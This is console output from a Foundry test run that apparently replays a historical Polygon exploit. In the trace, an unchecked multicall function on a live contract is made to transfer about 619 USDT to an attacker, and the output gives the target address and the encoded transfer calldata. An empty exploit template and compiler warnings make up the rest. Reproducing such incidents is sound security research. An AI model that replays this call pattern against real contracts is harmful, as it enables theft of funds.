Compiling 21 files with Solc 0.8.28
Compiling 20 files with Solc 0.8.10
Solc 0.8.28 finished in 871.68ms
Solc 0.8.10 finished in 1.09s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-10/MulticallWithoutCheck_exp.sol:28:5:
   |
28 |     IERC20 USDT = IERC20(0xc2132D05D31c914a87C6611C10748AEb04B58e8F);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 849.26ms (1.71ms CPU time)

Ran 1 test for src/test/2022-10/MulticallWithoutCheck_exp.sol:ContractTest
[PASS] testExploit() (gas: 53168)
Logs:
  [End] Attacker USDT balance after exploit: 619.748460

Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("polygon", 34743770 [3.474e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [57968] ContractTest::testExploit()
    ├─ [7962] 0xc2132D05D31c914a87C6611C10748AEb04B58e8F::balanceOf(0x940cE652A51EBadB5dF09d605dBEDA95fDcF697b) [staticcall]
    │   ├─ [2608] 0x7FFB3d637014488b63fb9858E279385685AFc1e2::balanceOf(0x940cE652A51EBadB5dF09d605dBEDA95fDcF697b) [delegatecall]
    │   │   └─ ← [Return] 619748460 [6.197e8]
    │   └─ ← [Return] 619748460 [6.197e8]
    ├─ [31516] 0x940cE652A51EBadB5dF09d605dBEDA95fDcF697b::multicallWithoutCheck([Call({ target: 0xc2132D05D31c914a87C6611C10748AEb04B58e8F, callData: 0xa9059cbb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000024f09c6c, value: 0 })])
    │   ├─ [29198] 0xc2132D05D31c914a87C6611C10748AEb04B58e8F::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 619748460 [6.197e8])
    │   │   ├─ [28338] 0x7FFB3d637014488b63fb9858E279385685AFc1e2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 619748460 [6.197e8]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x940cE652A51EBadB5dF09d605dBEDA95fDcF697b, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 619748460 [6.197e8])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x22a8c507e1f04162f7488b38a1fe5f78471a323512239ade4da4ab88bdb94793: 0x0000000000000000000000000000000000000000000000000000000024f09c6c → 0
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000000024f09c6c
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [1462] 0xc2132D05D31c914a87C6611C10748AEb04B58e8F::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [608] 0x7FFB3d637014488b63fb9858E279385685AFc1e2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 619748460 [6.197e8]
    │   └─ ← [Return] 619748460 [6.197e8]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT balance after exploit", val: 619748460 [6.197e8], decimals: 6)
    ├─  storage changes:
    │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000000024f09c6c
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.14s (3.63s CPU time)

Ran 2 test suites in 5.15s (5.99s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
